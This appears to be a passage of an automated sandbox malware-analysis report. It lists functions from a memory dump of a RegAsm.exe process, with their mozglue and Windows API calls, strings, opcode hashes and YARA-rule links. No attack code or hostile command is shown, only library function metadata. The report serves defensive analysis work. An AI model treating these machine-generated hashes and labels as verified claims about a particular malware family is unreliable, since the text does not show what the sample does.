                                                                                                                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6C63D1C5), ref: 6C62D52E
                                                                                                                                                        • EnterCriticalSection.KERNEL32(6C68E7DC), ref: 6C62D690
                                                                                                                                                        • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C62D6A6
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(6C68E7DC), ref: 6C62D712
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(6C68E784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6C63D1C5), ref: 6C62D751
                                                                                                                                                        • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C62D7EA
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalSection$Leave$Enter$K@1@Maybe@_RandomUint64@mozilla@@$CountInitializeSpin
                                                                                                                                                        • String ID: : (malloc) Error initializing arena$<jemalloc>
                                                                                                                                                        • API String ID: 2690322072-3894294050
                                                                                                                                                        • Opcode ID: f96742746f501eb60325de89bee453cd685ab2a5b61b6e25f20f75dc310f7632
                                                                                                                                                        • Instruction ID: c07837f74cf5d466079c830013f7dbf00764dc5b5f18a02f61d33ea3d0c0a488
                                                                                                                                                        • Opcode Fuzzy Hash: f96742746f501eb60325de89bee453cd685ab2a5b61b6e25f20f75dc310f7632
                                                                                                                                                        • Instruction Fuzzy Hash: BD910271A053019FD714CF29C49076AB7E1EF8A308F14892EE49AC7B80D778E844CF9A
                                                                                                                                                        Function 6C664EA0 Relevance: 16.2, APIs: 8, Strings: 1, Instructions: 408sleepCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • Sleep.KERNEL32(000007D0), ref: 6C664EFF
                                                                                                                                                        • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C664F2E
                                                                                                                                                        • moz_xmalloc.MOZGLUE ref: 6C664F52
                                                                                                                                                        • memset.VCRUNTIME140(00000000,00000000), ref: 6C664F62
                                                                                                                                                        • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6652B2
                                                                                                                                                        • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6652E6
                                                                                                                                                        • Sleep.KERNEL32(00000010), ref: 6C665481
                                                                                                                                                        • free.MOZGLUE(?), ref: 6C665498
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: floor$Sleep$freememsetmoz_xmalloc
                                                                                                                                                        • String ID: (
                                                                                                                                                        • API String ID: 4104871533-3887548279
                                                                                                                                                        • Opcode ID: aae208f8692444443be670fbcc5439ec62b5c9285f8ed4ac9987b0b291b08e34
                                                                                                                                                        • Instruction ID: ddd105aa4c7924ac7bcd64941664b2f1f753274f52493919da85b1454f32e8a2
                                                                                                                                                        • Opcode Fuzzy Hash: aae208f8692444443be670fbcc5439ec62b5c9285f8ed4ac9987b0b291b08e34
                                                                                                                                                        • Instruction Fuzzy Hash: D8F1E471A19B008FC716CF3AC89062BB7F5AFD7384F058B2EF846A7651DB3194428B56
                                                                                                                                                        Function 6C629E50 Relevance: 13.1, APIs: 6, Strings: 1, Instructions: 878COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6C629EB8
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 6C629F24
                                                                                                                                                        • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C629F34
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 6C62A823
                                                                                                                                                        • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C62A83C
                                                                                                                                                        • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C62A849
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalSection$K@1@LeaveMaybe@_RandomUint64@mozilla@@$Entermemset
                                                                                                                                                        • String ID: MOZ_RELEASE_ASSERT(mNode)
                                                                                                                                                        • API String ID: 2950001534-1351931279
                                                                                                                                                        • Opcode ID: 7d1041ee1c387d255d17473ec4b6c28fa263fa2aed3175ec75913a8a18a5b968
                                                                                                                                                        • Instruction ID: 4f2262afc0a55808d710399ed781e2285844ac8df672e1161309d599ea39b92e
                                                                                                                                                        • Opcode Fuzzy Hash: 7d1041ee1c387d255d17473ec4b6c28fa263fa2aed3175ec75913a8a18a5b968
                                                                                                                                                        • Instruction Fuzzy Hash: B2726A72A056118FD304CF28C540655FBE1FF89728F29C66DE8699B792D3B9E842CF84
                                                                                                                                                        Function 6C652C10 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 228stringCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • ?EcmaScriptConverter@DoubleToStringConverter@double_conversion@@SAABV12@XZ.MOZGLUE ref: 6C652C31
                                                                                                                                                        • ?ToShortestIeeeNumber@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@W4DtoaMode@12@@Z.MOZGLUE ref: 6C652C61
                                                                                                                                                          • Part of subcall function 6C604DE0: ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C604E5A
                                                                                                                                                          • Part of subcall function 6C604DE0: ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C604E97
                                                                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C652C82
                                                                                                                                                        • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C652E2D
                                                                                                                                                          • Part of subcall function 6C6181B0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,00000000,?,ProfileBuffer parse error: %s,expected a ProfilerOverheadDuration entry after ProfilerOverheadTime), ref: 6C6181DE
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: String$Double$Converter@double_conversion@@$Dtoa$Ascii@Builder@2@Builder@2@@Converter@CreateDecimalEcmaIeeeMode@12@Mode@12@@Number@Representation@ScriptShortestV12@__acrt_iob_func__stdio_common_vfprintfstrlen
                                                                                                                                                        • String ID: (root)$ProfileBuffer parse error: %s$expected a Time entry
                                                                                                                                                        • API String ID: 801438305-4149320968
                                                                                                                                                        • Opcode ID: 2bb67602350e17657f5ff979e07835572430228dc52fe32c11400b5643ef5cda
                                                                                                                                                        • Instruction ID: 1a192965f128292f023c785a03ebdb8b44985d7016e653d774e50796a938f5f8
                                                                                                                                                        • Opcode Fuzzy Hash: 2bb67602350e17657f5ff979e07835572430228dc52fe32c11400b5643ef5cda
                                                                                                                                                        • Instruction Fuzzy Hash: 8691C0706087808FC724CF24C4806AEB7E0AFCA358FA04E2DE59A9B751DB30D559CB5A
                                                                                                                                                        Function 6C669E30 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 347COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __aulldiv__aullrem
                                                                                                                                                        • String ID: -Infinity$NaN
                                                                                                                                                        • API String ID: 3839614884-2141177498
                                                                                                                                                        • Opcode ID: 923dc3f788ad4343199474e1c259c3e50de970de1fb5f55933b1a4e874de0010
                                                                                                                                                        • Instruction ID: 4a418b5961d5d5ffd76d52400e96a2c8f0e725be3e36a70141cf47e46dccf7ab
                                                                                                                                                        • Opcode Fuzzy Hash: 923dc3f788ad4343199474e1c259c3e50de970de1fb5f55933b1a4e874de0010
                                                                                                                                                        • Instruction Fuzzy Hash: 02C1A171E043288BDB14CFAAC8507EEF7B6FF85308F144529D405ABB81D771A949CB9A
                                                                                                                                                        Function 6C60D4E0 Relevance: 10.8, Strings: 8, Instructions: 805COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: $-$0$0$1$8$9$@
                                                                                                                                                        • API String ID: 0-3654031807
                                                                                                                                                        • Opcode ID: 46ece93fc08398ab456e68e69f572bf67d6957cf2d9dc8c57b4331fffd82b534
                                                                                                                                                        • Instruction ID: 9c40922f72fb3d2478b73170afbfb4d29b6aca6b213c867401da16307a6ed4d0
                                                                                                                                                        • Opcode Fuzzy Hash: 46ece93fc08398ab456e68e69f572bf67d6957cf2d9dc8c57b4331fffd82b534
                                                                                                                                                        • Instruction Fuzzy Hash: 3B62C07070C7458FD719CE18C29079ABBF2AF86358F184B0DE8D56BA91C3759885CB8A
                                                                                                                                                        Function 6C67545C Relevance: 9.3, APIs: 5, Strings: 1, Instructions: 305COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • memset.VCRUNTIME140(?,000000FF,?), ref: 6C678A4B
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memset
                                                                                                                                                        • String ID: ~q`l
                                                                                                                                                        • API String ID: 2221118986-3731770368
                                                                                                                                                        • Opcode ID: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
                                                                                                                                                        • Instruction ID: 4ca427d6d6dc5403ab8bbf0f7905e3c9ba72b7aa51fe39c81013f848bd97a41d
                                                                                                                                                        • Opcode Fuzzy Hash: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
                                                                                                                                                        • Instruction Fuzzy Hash: 5EB1E872E0021ACFDB24CF68CC907D8B7B2EF85314F1806A9C549EB795D730A995CBA4
                                                                                                                                                        Function 6C67542B Relevance: 9.3, APIs: 5, Strings: 1, Instructions: 287COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • memset.VCRUNTIME140(?,000000FF,?), ref: 6C6788F0
                                                                                                                                                        • memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C67925C
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memset
                                                                                                                                                        • String ID: ~q`l
                                                                                                                                                        • API String ID: 2221118986-3731770368
                                                                                                                                                        • Opcode ID: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
                                                                                                                                                        • Instruction ID: 9083719750cb22303eb09db89a9770700b0f42f6b80a83dedfe12c2b31c5c1e5
                                                                                                                                                        • Opcode Fuzzy Hash: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
                                                                                                                                                        • Instruction Fuzzy Hash: D6B1C672E0420ACBDB24CF58C8816EDB7B2EF85314F1406A9C549EB795D730AD99CBA4
                                                                                                                                                        Function 6C60BEF0 Relevance: 8.2, APIs: 5, Instructions: 652COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __aulldiv$__aullrem
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2022606265-0
                                                                                                                                                        • Opcode ID: f56df46d33552dd8100cae53d24ae323fb4832d86786e5cbb4b774b0e277ade9
                                                                                                                                                        • Instruction ID: 8f3689bea2474adecbbada4f8cef6c21ed77366f3c595d22d6d97c74ead535f2
                                                                                                                                                        • Opcode Fuzzy Hash: f56df46d33552dd8100cae53d24ae323fb4832d86786e5cbb4b774b0e277ade9
                                                                                                                                                        • Instruction Fuzzy Hash: 5F320432B146119FC71CDE2CC890656BBE6AFC9310F09866DE89ADB395D730ED05CB91
                                                                                                                                                        Function 6C646CF0 Relevance: 4.7, APIs: 3, Instructions: 231COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • InitializeConditionVariable.KERNEL32(?), ref: 6C646D45
                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C646E1E
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ConditionExclusiveInitializeLockReleaseVariable
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4169067295-0
                                                                                                                                                        • Opcode ID: 7428b47c0400ee30af2ca7b196917403ac203b17c3066d654b41df602062b7de
                                                                                                                                                        • Instruction ID: 198c88e9938d850a91bc16b888d59b33eb5a72ecf2ded81720292ed566d4a178
                                                                                                                                                        • Opcode Fuzzy Hash: 7428b47c0400ee30af2ca7b196917403ac203b17c3066d654b41df602062b7de
                                                                                                                                                        • Instruction Fuzzy Hash: D4A17E746183819FC715CF25C480BAEBBF2BF89308F54895DE88A87751DB70E849CB96
                                                                                                                                                        Function 6C624640 Relevance: 4.3, APIs: 1, Strings: 1, Instructions: 1251memoryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • VirtualAlloc.KERNEL32(?,?,00001000,00000004), ref: 6C624777
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                                        • String ID: MOZ_RELEASE_ASSERT(mNode)
                                                                                                                                                        • API String ID: 4275171209-1351931279
                                                                                                                                                        • Opcode ID: 2acc62b44510e416a62a50c85144a462fc3fe987a5e9a39e28314a02b39e36ae
                                                                                                                                                        • Instruction ID: 66e8a9f5b9e75e7a9bd833c9c40706962c8d8cb345b897af4bd77fdb7a1ee8b0
                                                                                                                                                        • Opcode Fuzzy Hash: 2acc62b44510e416a62a50c85144a462fc3fe987a5e9a39e28314a02b39e36ae
                                                                                                                                                        • Instruction Fuzzy Hash: 32B28D71A166018FC318CF18C590725BBE2BFC5324B29C76DE86A8B6E9D775D841CF88
                                                                                                                                                        Function 6C6685F0 Relevance: 3.6, APIs: 2, Instructions: 619COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __aulldiv
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3732870572-0
                                                                                                                                                        • Opcode ID: db5f37eeb5151a0c79d842b80d44bf315513e08190c289969ce06011ea5de0b8
                                                                                                                                                        • Instruction ID: f9d3bff78544cdf3ef70669f7b5d46c33e7168f33fa8f3de550c445da0109ac9
                                                                                                                                                        • Opcode Fuzzy Hash: db5f37eeb5151a0c79d842b80d44bf315513e08190c289969ce06011ea5de0b8
                                                                                                                                                        • Instruction Fuzzy Hash: 65327231F001198BDF18CEADC4A17AEB7B2FB89304F15853AD506FBBA0D6349D458B96
                                                                                                                                                        Function 6C6776E3 Relevance: 1.8, Strings: 1, Instructions: 540COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: ~q`l
                                                                                                                                                        • API String ID: 0-3731770368
                                                                                                                                                        • Opcode ID: 72fe09860ade046fc3bdcfcdda7f36b59b22c90a724c00f6b1989c1cc893ef4e
                                                                                                                                                        • Instruction ID: 1d94e05a20308442e2acf94f33bffc52907afa162bdcd8c1afaa69981a86f59a
                                                                                                                                                        • Opcode Fuzzy Hash: 72fe09860ade046fc3bdcfcdda7f36b59b22c90a724c00f6b1989c1cc893ef4e
                                                                                                                                                        • Instruction Fuzzy Hash: BC321971E002198FDB25CF98C890AADFBF2FF88308F648569C549A7745D731A986CF94
                                                                                                                                                        Function 6C676E63 Relevance: 1.7, Strings: 1, Instructions: 498COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: ~q`l
                                                                                                                                                        • API String ID: 0-3731770368
                                                                                                                                                        • Opcode ID: a22d295006b0cf76062ece48329bf5a81d073d80eca1d8f36db09750ec8a7875
                                                                                                                                                        • Instruction ID: 7cc1f4d1a7277ddfb6b591ec876d729a85cc9dc3d1abbbe71549c9c506f0bb5e
                                                                                                                                                        • Opcode Fuzzy Hash: a22d295006b0cf76062ece48329bf5a81d073d80eca1d8f36db09750ec8a7875
                                                                                                                                                        • Instruction Fuzzy Hash: 12220871E002198FCB25CF98C980AADF7F2FF89304F6485A9C549A7745D731A986CF94
                                                                                                                                                        Function 6C645C10 Relevance: 1.6, APIs: 1, Instructions: 333COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • memcmp.VCRUNTIME140(?,?,6C614A63,?,?), ref: 6C645F06
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memcmp
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1475443563-0
                                                                                                                                                        • Opcode ID: c85ad555fb831d0ddcb95c3b05f13bf5accf2641c2a3abeef3a04a84d651fcf0
                                                                                                                                                        • Instruction ID: e6e8adfe6c0b8ff8e8f9f7f1703b0936a4e97b43bd55bcefbe26b5a72865a75f
                                                                                                                                                        • Opcode Fuzzy Hash: c85ad555fb831d0ddcb95c3b05f13bf5accf2641c2a3abeef3a04a84d651fcf0
                                                                                                                                                        • Instruction Fuzzy Hash: 76C19D75E012099BCB04CF95C5906EEBBF2BF8A318F28C15DD8556BB44D732A806CF94
                                                                                                                                                        Function 6C630512 Relevance: .5, Instructions: 466COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
